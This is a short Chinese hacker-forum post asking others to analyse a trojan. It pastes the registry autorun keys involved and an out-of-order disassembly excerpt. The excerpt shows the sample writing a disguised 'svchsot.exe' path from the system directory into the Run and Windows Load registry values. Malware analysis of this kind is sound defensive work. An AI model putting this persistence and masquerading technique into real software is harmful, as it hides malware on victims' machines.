这个木马程序谁分析一下？ - 红客吧

level 1

悟万事之理楼主

HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\S-1-5-21-515967899-162531612-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load
10001FEA 56 push esi
10001FEB 68 04010000 push 104
10001FF0 50 push eax
10001FF1 FF15 2CA00010 call dword ptr ds:[<&KERNEL32.GetSystemDirectoryA>]
; kernel32.GetSystemDirectoryA
10001FF7 8D4C24 08 lea ecx,dword ptr ss:[esp+8]
10001FFB 68 CCC10010 push locarxjh.1000C1CC
; ASCII "\svchsot.exe"
10002000 51 push ecx
10002001 FF15 18A00010 call dword ptr ds:[<&KERNEL32.lstrcatA>]
; kernel32.lstrcatA
10002007 8D5424 04 lea edx,dword ptr ss:[esp+4]
1000200B 8BF0 mov esi,eax
1000200D 52 push edx
1000200E 68 06000200 push 20006
10002013 6A 00 push 0
10002015 68 9CC10010 push locarxjh.1000C19C
; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
1000201A 68 02000080 push 80000002
1000201F FF15 08A00010 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>]
; ADVAPI32.RegOpenKeyExA
10002025 85C0 test eax,eax
10002027 74 15 je short locarxjh.1000203E
10002029 8B4424 04 mov eax,dword ptr ss:[esp+4]
1000202D 50 push eax
1000202E FF15 04A00010 call dword ptr ds:[<&ADVAPI32.RegCloseKey>]
; ADVAPI32.RegCloseKey
10002832 68 04010000 push 104
10002837 56 push esi
10002838 6A 01 push 1
1000283A 6A 00 push 0
1000283C 68 44C20010 push locarxjh.1000C244
; ASCII "load"
10002841 51 push ecx
10002842 FF15 00A00010 call dword ptr ds:[<&ADVAPI32.RegSetValueExA>]
; ADVAPI32.RegSetValueExA
10002042 68 04010000 push 104
10002047 56 push esi
10002048 6A 01 push 1
1000204A 6A 00 push 0
1000204C 68 94C10010 push locarxjh.1000C194
; ASCII "foxwow"
10002051 51 push ecx
10002052 FF15 00A00010 call dword ptr ds:[<&ADVAPI32.RegSetValueExA>]
; ADVAPI32.RegSetValueExA

2012年02月22日 16点02分 1